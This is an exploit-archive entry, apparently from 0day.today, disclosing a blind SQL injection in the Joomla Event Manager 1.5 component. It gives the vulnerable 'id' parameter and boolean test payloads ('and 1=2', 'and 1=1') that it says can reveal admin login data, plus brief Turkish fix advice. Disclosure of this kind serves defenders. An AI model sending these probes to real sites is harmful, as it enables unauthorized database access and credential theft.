id: 10322
date: 12/18/2009
title: Joomla Component Event Manager Blind SQL Injection Vulnerability
author: Fl0riX
cves: 

================================================================
Joomla Component Event Manager Blind SQL Injection Vulnerability
================================================================

<------------------- header data start ------------------- >
 
#####################################################################
#Joomla Component Event Manager Blind SQL Injection Vulnerability   #                                 
#####################################################################
 
 
# author        : Fl0riX
 
# Script Name    : Joomla Component Event Manager 1.5
 
# Bug Type       : Blind SQL Injection
 
# Infection      : Admin login bilgileri al&#65533;nabilir.
 
# Demo Vuln.     :
(+)
&#65533; http://server/eventmanager/index.php?option=com_content&view=article&id=44 and 1=2
(+)
&#65533; http://server/eventmanager/index.php?option=com_content&view=article&id=44 and 1=1
 
# Bug Fix Advice : Zararl&#65533; karakterler filtrelenmelidir.
 
#############################################################
 
< ------------------- header data end of ------------------- >
 
< -- bug code start -- >
 
path/index.php?option=com_content&view=article&id=[Blind]
 
< -- bug code end of -- >



#  0day.today [2023-03-25]  #